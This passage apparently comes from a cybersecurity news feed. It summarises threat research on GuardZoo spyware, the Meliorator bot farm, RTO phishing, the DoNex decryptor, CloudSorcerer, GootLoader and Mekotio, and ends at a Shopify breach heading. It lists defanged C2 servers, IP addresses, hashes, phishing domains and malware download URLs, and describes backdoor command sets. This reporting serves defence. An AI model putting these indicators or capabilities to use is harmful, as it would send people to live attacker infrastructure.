RADIUS Mitigation and Future Outlook

The IETF RADEXT working group is said to be working on pushing for the standardization of the RADIUS protocol as more secure alternative, which the researchers state would help mitigate against the Blast-RADIUS vulnerability. While the researchers note that major RADIUS implementations are working on releasing various patches to mitigate the vulnerability, they said the attack demonstrates the need to scrap and move away from the aging protocol entirely. In the meantime, the researchers urge system administrators to check with vendors for possible patches against the vulnerability and to follow best practices for secure RADIUS configuration. The Blast-RADIUS attack serves as a reminder that even long-standing protocols can harbor critical flaws. The research demonstrates that as networks deployments grow more complex, there must be continued scrutiny of these technologies to maintain security.

Cybersecurity researchers observed an Android surveillance campaign active since October 2019 that has targeted the military personnel of various countries in the Middle East. The researchers believe the operation has ties to a Houthi-aligned threat actor. Referred to as "GuardZoo," the spyware has infected devices belonging to more than 450 victims. The campaign remains active with researchers still analyzing related activity.

GuardZoo Infection of Middle Eastern Military Targets

GuardZoo is based on Dendroid RAT, an underground RAT program available for purchase at $300 that also included a binding utility to infect legitimate programs that had been leaked online in 2014. Researchers noted many modifications to the original source code to implement additional capabilities while removing some unused functions. The GuardZoo malware uses a new C2 backend created with ASP.NET. instead of relying on the native Dendroid RAT's PHP web panel for remote Command and Control (C2). The researchers from Lookout attribute the campaign to a Yemeni, Houthi-aligned threat actor based on the application lures, exfiltrated data, targeting, and the C2 infrastructure location. The campaign has been observed to primarily target victims in Yemen, Saudi Arabia, Egypt, Oman, the UAE, Qatar, and Turkey. [caption id="attachment_81170" align="alignnone" width="314"] Source: www.lookout.com[/caption] [caption id="attachment_81169" align="alignnone" width="896"] Source: www.lookout.com[/caption] The researchers observed the use of two C2 addresses, the first of which functioned as the primary address - https://wwwgoogl.zapto[.]org - and the second as a backup address: https://somrasdc.ddns[.]net. The malware is able to receive over 60 different commands from these C2 servers. These commands are mostly exclusive implementations to Guardzoo. The researchers compiled a list of some of the most notable C2 commands and their respective functions: [caption id="attachment_81175" align="alignnone" width="446"] Source: www.lookout.com[/caption] GuardZoo can collect a wide range of data from infected devices, including photos, documents, location data, saved GPS routes and tracks, device model number, mobile carrier, and Wi-Fi configuration. Moreover, it can enable the actor to deploy additional invasive malware on the infected device. The device's location, model, and cellular service carrier can also be collected. The surveillanceware is distributed via WhatsApp, WhatsApp Business, and direct browser download, and uses military themes to lure victims. Lookout researchers have observed recent samples of GuardZoo posing as religious, e-book, and military-themed apps, such as 'The Holy Quran,' 'Constitution of the Armed Forces,' 'Limited - Commander and Staff,' and 'Restructuring of the New Armed Forces.' [caption id="attachment_81186" align="alignnone" width="1274"] Source: www.lookout.com[/caption]

Researchers Trace Houthi Connection

Researchers found evidence linking GuardZoo to Yemen's Houthi militia, which the U.S. government recently redesignated as a global terrorist group. Analysis of server logs revealed that many of the identified victims appeared to be members of the pro-Hadi forces in Yemen. Additionally, the malware's C2 servers were found to be hosted on YemenNet infrastructure belonging to an ISP that is state-owned by the Yemeni government. Researchers noted that some of the log entries indicated that the devices belonged forces aligned with President Hadi's government that operates from Aden. One of the exfiltrated documents contained phrases that translated to “Very Confidential, Republic of Yemen, Ministry of Defense, Chief of the General Staff, War Operations Department, Insurance division.“

Protection Against GuardZoo

Aaron Cockerill, Executive Vice President of Product & Security at the security firm, stated, “These spyware packages can be used to collect a wide range of data from infected devices, which in the case of GuardZoo, could put military personnel and operations at risk. We urge security professionals to be aware of this threat and to take steps to protect their users, and work and personal data.” To protect both business and personal Android devices from GuardZoo and other surveillanceware, the researchers have recommended the following basic steps:

• Keep your operating system and apps up to date, as most updates nowadays are related to security patches.
• Only install apps from Google Play, not third-party sources. If you receive a message asking you to install an app from a website, immediately block the number and report the incident to your IT or Security team.
• Be mindful of the permissions that mobile apps ask for. Overly invasive permissions, even from legitimate apps, could create data risk for your organization.
• Implement a mobile security solution that can detect and protect against malware and keep your organization safe.

The U.S. Federal Bureau of Investigation (FBI), along with the domestic Cyber National Mission Force and several international intelligence agencies, have uncovered a sophisticated Russian-backed operation that used an artificial intelligence-powered bot farm to spread disinformation on social media platforms. The agencies - which included international partners such as the Netherlands General Intelligence and Security Service and the Canadian Centre for Cyber Security - have released a joint advisory to warn social media companies about Russian state-sponsored actors employing the Meliorator software for malign influence activity in foreign nations and the United States. While currently focused on X (formerly Twitter), analysts believe the tool's developers intend to expand to other platforms.

Meliorator Bot Farm Characteristics and Capabilities

[caption id="attachment_81055" align="alignnone" width="2004"] Agencies Involved in the investigation of Russian operation (Source: www.ic3.gov)[/caption] The Meliorator tool creates bot persona 'souls' (false identities) with varying levels of information on their profiles and relevant 'thoughts' (automated actions). The first bot archetype has complete profiles, including a profile photo, cover photo, and biographical data, while the second archetype has very little information. The third archetype appears real by generating a lot of activity and garnering followers. [caption id="attachment_81052" align="aligncenter" width="505"] Source: www.ic3.gov[/caption] The bot personas are capable of deploying content similar to typical social media users, mirroring disinformation from existing bot personas, perpetuating specified pre-existing false narratives, and formulating messaging based on the specific archetype of the bot. To avoid detection, the creators of the Meliorator tool used various obfuscation techniques, including IP address obfuscation, bypass of dual factor authentication, and modification of browser user agent strings to appear more consistent. The bot personas also follow genuine accounts reflective of their political leanings and interests listed in their biography, making them appear more authentic to viewers. The tool has been used by FSB services since 2022 to generate mass quantities of social media profiles that appear to be authentic. The software includes an administrator panel called "Brigadir" and a seeding tool named "Taras," which contains backend files to control the personas used to spread disinformation. These "souls" are stored in a MongoDB database for easy manipulation. Operators access Meliorator through virtual network computing that is hosted at dtxt.mlrtr[.]com using project management software from Redmine.

Justice Department Seizes Associated Domains

In relation to the joint action by intelligence agencies, the U.S. Justice Department announced the seizure of two related domain names, and 968 social media accounts used in malign influence operations. According to the press release, the bot farm was developed by an individual identified as Individual A, who worked as the deputy editor-in-chief at RT, a state-run Russian news organization. In early 2022, when RT leadership sought to develop alternative means for distributing information beyond traditional news broadcasts, Individual A had led the development of software to create and operate a social media bot farm, with the capability of creating fictitious online personas on a wide-scale basis to advance the mission of the FSB and the Russian government. The bot farm's operators used the network to spread disinformation on various topics, including the Russia-Ukraine conflict. These included videos in which President Putin justified Russia's actions in Ukraine, and claims that certain areas of Poland, Ukraine, and Lithuania were "gifts" to those countries from the Russian forces that liberated them from Nazi control during World War II. [caption id="attachment_81046" align="alignnone" width="420"] Source: justice.gov[/caption] [caption id="attachment_81047" align="alignnone" width="430"] Source: justice.gov[/caption] The bot farm was also used to spread videos claiming that the number of foreign fighters fighting for the Ukrainian forces was significantly lower than public estimates. Deputy Attorney General Lisa Monaco stated, “Today’s action demonstrates that the Justice Department and our partners will not tolerate Russian government actors and their agents deploying AI to sow disinformation and fuel division among Americans.” “As malign actors accelerate their criminal misuse of AI, the Justice Department will respond and we will prioritize disruptive actions with our international partners and the private sector. We will not hesitate to shut down bot farms, seize illegally obtained internet domains, and take the fight to our adversaries,” she added. The FSB’s use of U.S.-based domain names, which the software used to register the bots, violates the International Emergency Economic Powers Act. In addition, the accompanying payments for that infrastructure violate federal money laundering laws. X (formerly Twitter) took action to voluntarily suspend bot accounts identified in the investigation for violation of its terms of service. The FBI worked with cybersecurity agencies from Canada, the Netherlands and other partners to analyze the bot farm's technology. The Justice Department has released a joint cybersecurity advisory on the research findings of the intelligence agencies, allowing social media platforms and researchers to identify and prevent further use of the technology. [caption id="attachment_81049" align="alignnone" width="1434"] Source: www.ic3.gov[/caption] The publication includes IP addresses, SSL certificates, mail server domains, and related details associated with the infrastructure of the Meliorator bot network.

Cyble Research and Intelligence Labs (CRIL) researchers have observed a new campaign in which threat actors claiming to be from India's Regional Transport Office (RTO) have targeted Indian WhatsApp users for phishing operations. The campaign marks a shift from earlier tactics, such as the use of WhatsApp in recent campaigns instead of SMS for delivering phishing messages. This shift includes a change in focus from banking customers to the targeting of government agencies and utility companies.

Regional Transport Office (RTO) WhatsApp Phishing Scam

The researchers said that since the beginning of 2024, Indian citizens have been observed receiving phishing messages on WhatsApp that impersonate the Regional Transport Office (RTO), also commonly referred to as Vahan Parivahan, a governmental organization in India responsible for vehicle registration, driver licensing, and other transport-related matters. [caption id="attachment_80990" align="alignnone" width="1587"] Source: cyble.com/blog[/caption] Targets have received various WhatsApp messages claiming that their vehicle was found to be in violation of traffic rules, with a download link to an app titled "VAHAN PARIVAHAN," supposedly intended for viewing official citations or a "challan"(government recognized document or receipt). These phishing messages abused legitimate regional RTO logos in their WhatsApp profile pictures to lend further cover and to lure potential victims to download the attached malware .APK application file. Once installed, the app requests permissions to access SMS messages and contacts. It runs in the background, collecting device information and sending it to the attackers through a Telegram bot. The malware then initiates a service to connect to a Firebase URL to retrieve additional lists of phone numbers and text messages. This service is used to deliver SMS messages from infected devices to phone numbers mentioned in the Firebase server. The researchers from Cyble had earlier noticed a remarkably similar campaign used to target the customers of major Indian banks through the use of malicious bank-related applications purporting to represent major Indian banks, even bearing similar names, icons and user interfaces to official banking apps. The malware in the earlier campaign was used to collect banking credentials, credit card details, personally identifiable information (PII) and email credentials from victims.

Researchers Observe Advancements in Malware Campaigns

The researchers noted that threat actors have been observed deploying advanced malware strains that do not rely on launcher activities. Examination of the manifest file from the recent campaign reveals the absence of a launcher activity, preventing an app icon from appearing on the app drawer of infected devices and making it harder for victims to identify and uninstall the malware. The RTO scam reflects broader changes among such campaigns, marked by:

• Shift from SMS to WhatsApp for distribution of phishing messages.
• Focus beyond banking targets to impersonation of legitimate utility bills and government schemes/authorities.
• Use of Malware-as-a-Service (MaaS) in campaigns.
• Additional stealthy tactics such as leaving out launcher activities to evade detection.

Along with sharing of potential Indicators of Compromise (IOCs) and classifying the campaign under MITRE categories, the researchers have listed some recommendations to protect against the campaign:

• Download software only from legitimate official sources such as the Google Play Store or the iOS App Store.
• Use of capable antivirus and internet security tools to scan downloaded software packages across internet-connected devices (PCs, laptops, and mobile devices).
• Use of stronger passwords and multi-factor authentication where possible.
• Use of biometric security functionality such as fingerprints or facial recognition to secure devices.
• Maintain vigilance regarding links received via SMS messages or emails.
• Enable Google Play Protect on Android devices.
• Be careful with permissions granted to downloaded apps.
• Regularly update devices, operating systems, and applications.

The researchers also noted the possibility of stealthy transfer of received digital payment (Unified Payments Interface) verification messages to attacker-operated devices to compromise payment systems within the campaign, as observed in other attacks. [caption id="attachment_80992" align="alignnone" width="1282"] Source: cyble.com/blog[/caption]

Researchers have discovered a critical flaw in the cryptographic schema of the DoNex ransomware and all of its variants and predecessors. Since then, they have collaborated with law enforcement agencies to discreetly provide a decryptor to affected DoNex victims since March 2024. The cryptographic vulnerability was publicly discussed at Recon 2024, prompting the researchers to officially disclose details of the flaw and its implications.

DoNex Ransomware Operations

Avast researchers noted that the DoNex ransomware has undergone several rebrandings after initially identifying as Muse in April 2022. Subsequent iterations of DoNex included a rebrand to a purported Fake LockBit 3.0 in November 2022, then to DarkRace in May 2023, and finally to DoNex in March 2024. Since April 2024, the researchers noted that no newer samples were detected, and that the ransomware group's official TOR address remained inactive, suggesting that DoNex may have ceased its evolution and rebranding attempts. DoNex ransomware employs a complex encryption process. During its execution, an encryption key is generated using the CryptGenRandom function. This key initializes a ChaCha20 symmetric key, which is then used to encrypt files. After encryption, the symmetric key is encrypted with RSA-4096 and appended to the affected file. For files up to 1 MB, the entire file is encrypted, while larger files are encrypted in segments of blocks. The ransomware's configuration, along with details over whitelisted extensions, files, and services to terminate, are stored in an XOR-encrypted configuration file. While the researchers have not detailed the exact process they used to decipher the decryption, more details related to the same cryptographic vulnerability are available from files related to the Recon 2024 event talk titled "Cryptography is hard: Breaking the DoNex ransomware." Gijs Rijnders, a malware reverse engineer and cyber threat intelligence analyst working for the Dutch National Police, hosted the talk. [caption id="attachment_80864" align="alignleft" width="298"] DoNex decryptor used by Dutch National Police, different from Avast version. (Source: cfp.recon.cx)[/caption] DoNex primarily targeted victims in the US, Italy, and Belgium, using focused attacks. The researchers confirmed that all variants of the DoNex ransomware along with its earlier versions can be decrypted using the released DoNex decryptor.  

  [caption id="attachment_80869" align="alignnone" width="697"] (Source: decoded.avast.io)[/caption]

Identifying DoNex Ransomware and Decryption

Victims of the DoNex ransomware can recognize an attack through the ransom note left by the malware. Although different variants (Fake LockBit, DarkRace and DoNex) of DoNex produce distinct ransom notes, they share a similar layout. [caption id="attachment_80867" align="alignnone" width="710"] Avast version of DoNex decryptor (Source: decoded.avast.io)[/caption] The researchers have shared instructions for using their decryptor against DoNex ransomware encrypted files:

1. Download the provided decyptor. (The researchers recommend running the 64-bit version of the program due to memory requirements.)
2. Run the decryptor's executable file as an administrator. The program should run as a wizard, automatically guiding you through the decryption process.
3. While the program lists all local drives by default, the user is requested to provide a list of possible locations meant to be decrypted.
4. Users are then requested to provide an encrypted file (from any variant of DoNex) as well as a copy of the original file before encryption. The researchers emphasize selecting the biggest possible pair of files for this process.
5.  The next process of the wizard will begin the password cracking process. The researchers state that while this process of cracking only takes a second, it would require a huge volume of memory. After the step has been completed, users can get ready to begin with the decryption process for all the files on their entire system.
6. In the final step, users can opt to back up encrypted files on their system, which may help in the event of failures during the decryption process. The researchers stated that the option is set at default.
7. Users can let the program run in an attempt to decrypt all the DoNex encrypted files on their system.

The researchers have also shared Indicators of compromise (IOCs) of the FakeLockBit 3.0, Dark Race and DoNex variants of the ransomware.

A recently passed Pennsylvania law aims to bolster consumer protections in the aftermath of data breaches. Act 33 of 2024, which is set to take effect in late September of this year, mandates stricter time limits for organizations to issue data breach notices and free provision of credit monitoring to affected individuals in the event of a data breach.

Key Provisions of Act 33 Pennsylvania Law

Under the provisions of the new law, organizations must notify the Pennsylvania Attorney General's Office if a data breach is found to affect more than 500 residents within the state of Pennsylvania. [caption id="attachment_80831" align="alignnone" width="2800"] Source: www.legis.state.pa.us[/caption] The notice is required to include the following details:

1) The organization name and location. (2) The date of the breach of the security of the system. (3) A summary of the breach incident of the security of the system. (4) An estimated total number of individuals affected by the breach of the security of the system. (5) An estimated total number of individuals in this Commonwealth affected by the breach of the security of the system.

Along with the reporting requirements, one of the key provisions of the law is the requirement for organizations to provide free credit reports and one year of credit monitoring to all affected consumers. The law introduces a new era of protection for consumers, requiring organizations to assume all costs and fees associated with providing affected individuals with access to credit reports and credit monitoring services. This provision means that individuals from Pennsylvania will not have to pay for these services, which can provide peace of mind in the event of a data breach and add an additional layer of protection to help prevent identity theft and financial fraud. The law defines personal information as an individual's first name or first initial and last name in combination with certain sensitive data elements, such as Social Security numbers, driver's licenses, or financial account numbers. The law is an extension of the amendment act of December 22, 2005 (P.L.474, No.94), which states:

"An act providing for security of computerized data and for the notification of residents whose personal information data was or may have been disclosed due to a breach of the security of the system; and imposing penalties," further providing for definitions, for notification of the breach of the security of the system and for notification of consumer reporting agencies; and providing for credit reporting and monitoring.

The Act 33 law received unanimous support in both chambers of the state legislature, reflecting the broad recognition of the need for stronger data protection measures.

Act Comes Amidst Geisinger Medical Center Data Breach Fall Out

Reports of data breach incidents across the United States have surged in recent years, with a record of 3,122 incidents reported in 2023 nationwide – a 72% increase from the previous high in 2021. According to data from the Identity Theft Resource Center, these breaches affected hundreds of millions of Americans and resulted in billions of dollars in losses. The new law comes in the wake of high-profile breaches like the one at Pennsylvania's Geisinger Medical Center, which potentially exposed personal information of approximately one million patients. A former employee in connection to the data breach has been arrested. Jonathan Friesen, Geisinger chief privacy officer, stated in response to the arrest, “Our patients’ and members’ privacy is a top priority, and we take protecting it very seriously.” He added, “We continue to work closely with the authorities on this investigation, and while I am grateful that the perpetrator was caught and is now facing federal charges, I am sorry that this happened.” Disgruntled former patients of the hospital have joined in a class action lawsuit filed against Geisinger, demanding compensation. One former patient, James Wierbowski, filed a lawsuit on June 28, seeking monetary relief that could amount to more than $5 million.

Security researchers discovered a new sophisticated cyberespionage tool targeting Russian government entities in May 2024. The tool, dubbed CloudSorcerer, exploits popular cloud infrastructure services such as Microsoft Graph, Yandex Cloud and Dropbox for use as command and control (C2) servers for stealth monitoring, data collection and exfiltration operations.

Technical Details of CloudSorcerer Campaign

Researchers from Kaspersky believe that a new APT group is behind the CloudSorcerer malware. The malware is a single Portable Executable (PE) binary written in the C language and adjusts Its functionality depending on the process from which it is executed. Upon execution, the malware calls the GetModuleFileNameA function to determine the name of the process from which it has been run and then compares these process names to a set of hardcoded strings indicating browser, mspaint.exe, and msiexec.exe identifiers. The malware activates different functions depending upon the identified process name:

• In mspaint.exe: Acts as a backdoor within the program to collect data and execute code.
• In msiexec.exe: Initiates C2 communication.
• In browser or other detected processes: Injects shellcode into targeted processes before terminating.

The malware's backdoor module begins by collecting system information about the victim machine, while running in a separate thread. This information includes computer name, user name, Windows subversion information, and system uptime. All the collected data is stored in a specially created structure. Once the information gathering is complete, the data is written to the named pipe \.\PIPE[1428] connected to the C2 module process. It then executes various commands based on received instructions, such as gathering drive information, collecting file and folder data, executing shell commands, manipulating files, injecting shellcode into processes, running advanced tasks like creating processes, modifying registry keys and managing network users. These commands are specified under a unique COMMAND_ID for each operation within the malware program: [caption id="attachment_80799" align="alignnone" width="863"] Source: securelist.com (Kaspersky)[/caption]

0x1 – Collect information about hard drives in the system, including logical drive names, capacity, and free space. 0x2 – Collect information about files and folders, such as name, size, and type. 0x3 – Execute shell commands using the ShellExecuteExW API. 0x4 – Copy, move, rename, or delete files. 0x5 – Read data from any file. 0x6 – Create and write data to any file. 0x8 – Receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process. 0x9 – Receive a PE file, create a section and map it into the remote process. 0x7 – Run additional advanced functionality.

The researchers also observed the use of Github pages as C2 servers, stealthily hidden as hex code within the author section of the profile. These profiles contained forks of public legitimate code repositories without any modification or changes to appear legitimate. The same hex string was also observed hidden within the names of public photo albums hosted on the Russian album-sharing service, https://my.mail[.]ru. Associated profiles on both services contained a photo of a male from a public photo bank. [caption id="attachment_80806" align="aligncenter" width="253"] Source: securelist.com (Kaspersky)[/caption] The malware picks up hex strings from these sources, breaking them into segments that represent different instructions. The first segment of the decoded hex string indicates the cloud service intended for malware usage. Example, a byte value of “1” represents Microsoft Graph cloud, byte “0” represents Yandex cloud. The segments that follow form a string used to authenticate various different cloud APIs, as well as a subset of functions for specific interactions with the selected cloud services.

Similarity to CloudWizard APT Campaign

While there researchers noted similarities in the campaign's modus operandi and tactics to the previously known CloudWizard APT group, they state that the significant differences in code and functionality in the malware used by both groups suggest that CloudSorcerer is likely from the work of a newer APT developing its own unique tools. The CloudSorcerer campaign represents the use of sophisticated operations against Russian government entities. Its use of popular cloud services such as Microsoft Graph, Yandex Cloud, and Dropbox for C2 infrastructure, along with GitHub and MyMail photo albums for initial C2 communications, demonstrates a well-organized approach to espionage. The malware’s ability to dynamically adapt its behavior depending upon the infected process along with its complex use of Windows pipes, further highlights its intricacy. The researchers have shared a list of indicators of compromise (IOCs) to help protect against deployment of the CloudSorcerer malware.

GootLoader, a sophisticated JavaScript-based malware has continued to confound cybersecurity experts with its unique evasion techniques. However, researchers have discovered a new method to circumvent its  anti-analysis methods through debugging it as Node.js code in Visual Studio Code. The research has cast new light on the malware's inner workings and highlighted various flaws in common sandbox-based analysis methods.

Debugging GootLoader's Evasive Techniques

While it is common among malware to perform sleep operations through the calling of the Wscript.sleep() or setTimeout() methods, most malware sandboxes easily detect these 'malware sleeping' methods. However, GootLoader employs advanced time-based delays and loop iterations for more effective evasion that can trick most sandbox environments. [caption id="attachment_80607" align="alignnone" width="1600"] Source: unit42.paloaltonetworks.com[/caption] While Gootkit had been first identified in 2014, it has undergone many changes over time. The original Gootkit malware consisted a Windows executable, but since 2020 Javascript-based variants of the malware named as Gootkit Loader, were spotted being distributed through through the use of fake forum posts. GootLoader can be used deliver several other types of malware, including ransomware. Despite these changes, the group has retained the same distribution tactics in 2024, with the forum posts nearly identical in content and appearance. Researchers from Palto Alto Networks analyzed a GootLoader malware sample through the novel use of Node.js debugging in Visual Studio Code on a Windows host. This approach allowed for step-by-step code execution and breakpoint setting, providing further insights into the malware's flow control and execution logic than typical standalone execution. The analysis revealed that the malware employs time-consuming while loops and array functions to deliberately delay the execution of its malicious code through the use of self-induced sleep periods to obfuscate its true nature. The researchers observed an infinite loop function, that supplied a variable with the same value on repeat , and upon stepping further into the malware's code, had discovered a 'horseq7' function array name. Upon analysis the code appeared to be stuck in a loop as it had taken over 10 minutes for the function to obtain the required counter value within the analysis environment. This function appeared to be where the actual malicious program began execution, with the researcher identifying several different counter values and respective functions. [caption id="attachment_80611" align="alignnone" width="2174"] Source: unit42.paloaltonetworks.com[/caption]

Flaws Within Sandbox Testing in Security Environments

Sandboxing techniques are commonly employed by security researchers to identify malicious binaries, their behaviour and execution within the benefit of a controlled environment. These sandboxes environments can  face hurdles such as the passing of large volumes of binaries against limited resources. GootLoader's intricate evasive techniques present various hurdles for sandbox environments, particularly those with severely limited computing resources, and time-constrained analysis. Understanding these techniques is crucial for researchers to develop more effective detection and analysis methods, such as enhanced sandbox environments to handle time-based evasion tactics and development of more sophisticated static and dynamic analysis tools which can potentially detect such circumventing functions.

Europol's recent paper sheds light on formidable challenges posed by Privacy Enhancing Technologies (PET) in Home Routing systems. These technologies, aimed at safeguarding user privacy, inadvertently hinder law enforcement agencies (LEAs) from intercepting communications originating from foreign SIM cards. Home Routing allows for service providers to continue providing services to paying customers even after they have travelled abroad. This limitation not only impedes investigations involving foreign nationals but also complicates cases where citizens use foreign SIM cards domestically. The new paper details how this technology could potentially delay or even prevent lawful access to evidence in serious criminal cases.

Europol Details Home Routing Intervention Challenges

The Europol paper states that the core issue lies in the implementation of Privacy Enhancing Technologies (PET) within Home Routing of telecommunication network. When PET is enabled, the visiting network can't access encryption keys used by the home network, making it impossible to retrieve unencrypted data. This creates a roadblock for LEAs, as they can no longer intercept communications from foreign SIM cards without cooperation from the home country's service provider. The inability to intercept communications from foreign SIM cards affects not only investigations of foreign nationals but also cases involving citizens using foreign SIM cards in their own country. This limitation extends beyond simple inconvenience:

• LEAs become dependent on cooperation from service providers in the suspect's home country.
• Domestic interception orders can't be enforced across borders.
• European Investigation Orders, while available, can take up to 120 days – too long for urgent cases.

These challenges stem from the disparity between the European single market, which allows service providers to operate across borders while law enforcement still remains limited by national jurisdictions.

Proposed Solutions to Home Routing

To address these issues, potential solutions must balance maintaining investigatory powers with protecting secure communications and the confidentiality of criminal investigations. The solutions outlined in the paper range from disabling the Privacy Enhancing Technologies (PET) in Home Routing networks, creation of a new legal framework to allow domestic law enforcement agencies to request the interception of a suspect's communication in the territory of another member state within the EU coupled with a common interface to interpret these laws and regulations across borders. The paper details these two potential approaches as solutions to navigate these challenges: 1. Legally mandating the disabling of PET in Home Routing:

• Maintains current security levels and law enforcement capabilities
• Allows domestic service providers to execute interception orders for foreign SIM cards
• Technically feasible and easily implemented
• Preserves privacy at the same level as communication via national SIM cards

2. Enabling cross-border interception requests:

• Allows LEAs to request interception from service providers in other EU member states
• Maintains PET for all users
• Requires development of cross-border standards and interfaces
• May compromise operational security by revealing persons of interest to foreign entities

The paper admits that the success of these solutions will depend on the cooperation of telecommunication service providers, law enforcement agencies, and national authorities. These challenges accentuate the criticalness of developing a solution that that balances the need for European law enforcement agencies to access data along with the need to protect the privacy and security of individuals with region. Earlier in 2019, the European Council raised the need for addressing and mitigating potential challenges to law enforcement agencies from the deployment of 5G networks and services. In the paper titled, 'The significance of 5G to the European Economy and the need to mitigate security risks linked to 5G', the Council  stressed on the need to, "address and mitigate potential challenges arising from the deployment of 5G networks and services to law enforcement including e.g. lawful interception."

As online shoppers ready themselves for the approaching Amazon Prime Day on July 16-17, 2024, a day known for unusually extensive deals and exclusive offers, cybercriminals appear ready to lure potential victims. Researchers observed an increase in new domains that incorporated the use of the Amazon brand over the last month, with the vast majority of these found to be suspicious and designed to steal sensitive information such as login credentials, payment details, and personal data from victims.

Amazon Prime Day Fake Domains

Researchers from Check Point observed the registration of over 1,230 such domains during June 2024, with   85% of these identified domains flagged as malicious or suspicious. These domains pose a significant threat to shoppers' personal and financial information. The researchers identified phishing activity, deceptive emails and malicious file attachments:

• Fake Domains: Newly created Amazon impersonating domains that mimic various legitimate Amazon Mexico websites to trick users into providing sensitive information and details. [caption id="attachment_80552" align="alignnone" width="705"] Source: blog.checkpoint.com[/caption] Examples of these fake domains include: -amazon-onboarding[.]com -amazonmxc[.]shop -amazonindo[.]com -shopamazon2[.]com -microsoft-amazon[.]shop -amazonapp[.]nl -shopamazon3[.]com -amazon-billing[.]top

• Distribution of malicious phishing files over alleged payment failures: Phishing campaigns use urgent language to prompt immediate action. One such attempt claimed a payment failure for an Amazon Prime Video order, directing users to a fraudulent login page.

[caption id="attachment_80546" align="alignleft" width="414"] Source: blog.checkpoint.com[/caption] Some attacks distribute files with misleading names like "Mail-AmazonReports-73074[264].pdf," containing false alerts about account suspension to steal payment details. The file lures victims by creating a false sense of urgency in informing them that their Amazon account had been suspended due to mismatched billing information, instructing them to update their payment details through a provided phishing link: trk[.]klclick3[.]com. The message within the file threatens account closure if immediate action is not taken by the victim, stoking fears about possible account termination or loss of access to services.   [caption id="attachment_80543" align="alignnone" width="973"] Source: blog.checkpoint.com[/caption]

Staying Safe With Online Shopping During Amazon Prime Day

According to a report on the Global State of Scams by the Global Anti-Scam Alliance consumers lost over  USD $1 trillion globally in 2023. Researchers behind the recent study have shared the following tips to help online shoppers stay safe during the Amazon Prime Day sales:

• Scrutinize URLs for misspellings or unusual domain extensions.
• Use strong, unique passwords for your Amazon account.
• Verify website security by looking for "https://" and the padlock icon.
• Be wary of requests for excessive personal information.
• Approach urgent emails with caution and verify their legitimacy.
• Trust your instincts about deals that seem too good to be true.
• Use credit cards for better fraud protection when shopping online.

A customer trust report from Amazon in March of this year indicated that over two-thirds of observed scams purported to be order or account issues. A paraphrased customer quote within the report stated:

“I got a random call from someone who claimed I bought something on Amazon that I hadn’t and they wanted my account information to verify this was an error.”

Amazon maintains a separate email address for customers to report scams at reportascam@amazon.com. In 2023, the e-commerce giant had taken down over 40,000 phishing websites and 10,000 phone numbers. Amazon also partners with organizations such as the Better Business Bureau (BBB, the Anti-Phishing Council in Japan, Microsoft and several cross-industry investigative groups to collaborate and add depth to the information collected by customers over reported scams. It is unknown if Amazon is taking any specific action related to scams that claim association with the Amazon Prime Day event.

The Mekotio banking trojan has resurfaced as a significant threat to financial institutions and individuals across Latin America. The Mekotio malware active since 2015, has primarily been used against several persistent target countries such as Brazil, Chile, Mexico, Spain and Peru with the focus of stealing sensitive information such as banking credentials. Mekotio shares similarities with other Latin American banking malware, such as Grandoreiro, who's operations had been recently disrupted by law enforcement.

Mekotio Infection and Operation

Researchers from Trend Micro noticed an uptick in the use of the Mekotio malware across campaigns. The researchers stated that Mekotio typically infiltrates systems through phishing emails purporting to be communications from tax agencies. These messages often claim the recipient has unpaid tax obligations while embedding malicious ZIP file attachments or links that download and execute the malware on the victim's system. [caption id="attachment_80407" align="alignnone" width="2247"] Source: trendmicro.com[/caption] Once activated, Mekotio gathers system information and establishes a connection with a command-and-control server. The malware performs the following operations on infected systems:

• Credential theft: Mekotio displays fake pop-ups mimicking legitimate banking sites to trick users into entering their login details.
• Information gathering: The trojan captures screenshots, logs keystrokes and steals clipboard data.
• Persistence: Mekotio employs tactics like adding itself to startup programs or creating scheduled tasks to maintain its presence on infected systems.

Several security researchers have investigated previous campaigns involving the use of the Mekotio malware, often noting it as a geolocation-specific Trojan. A threat summary from Microsoft Security Intelligence states, "The Mekotio Trojan evades detection using a malicious DLL that executes using DLL sideloading, since the DLL and executable loading the DLL is dropped in the same folder. The folder is the first location where an executable searches for a loading module to help execute the malicious dropped DLL before reaching the original DLL." The page also notes that victims may be restricted from accessing legitimate banking websites after infection.

Prevention and Mitigation Against Mekotio

The researchers have advised the maintenance of proper practices to combat threats such as Mekotio. These include:

• Being skeptical of unsolicited emails and verifying the sender's email address.
• Avoiding clicking on links and downloading attachments unless absolutely certain of the sender's identity.
• Verifying sender identity by contacting the sender through known contact details.
• Using email filters and anti-spam software, and ensuring they are up to date.
• Reporting phishing attempts to IT and security teams when applicable.
• Educating employees on security best practices, including phishing and social engineering tactics.

The researchers also shared the following potential indicators of compromise: File Hashes: 5e92f0fcddc1478d46914835f012137d7ee3c217 f68d3a25433888aa606e18f0717d693443fe9f5a 3fe5d098952796c0593881800975bcb09f1fe9ed 1087b318449d7184131f0f21a2810013b166bf37 ef22c6b4323a4557ad235f5bd80d995a6a15024a C&C servers: 23[.]239[.]4[.]149:80 68[.]233[.]238[.]122:80 34[.]117[.]186[.]192:80 68[.]221[.]121[.]160:9095 68[.]221[.]121[.]160:80 tudoprafrente[.]org tudoprafrente[.]co:7958 Downloads: hxxps://intimaciones[.]afip[.]gob[.]ar[.]kdental[.]cl/Documentos_Intimacion/ hxxps://techpowerup[.]net/cgefacturacl/descargafactmayo/eletricidad/ hxxps://christcrucifiedinternational[.]org/descargafactmayo/eletricidad/ By adhering to these guidelines, maintaining vigilance and scrutinising possible attack indications, organizations and individuals can significantly reduce their risk of falling victim to the Mekotio banking trojan.

A known threat actor on the BreachForums who uses the moniker '888' has shared data allegedly stolen from Shopify in a data breach incident. The data is claimed to consist personal details, email subscriptions and order-related information of its users. Shopify Inc. is a Canada-based multinational business that offers a proprietary e-commerce platform along with integrations to allow individuals, retailers and other businesses to setup their own online stores or retail point-of-sale websites.

Alleged Shopify Data Breach

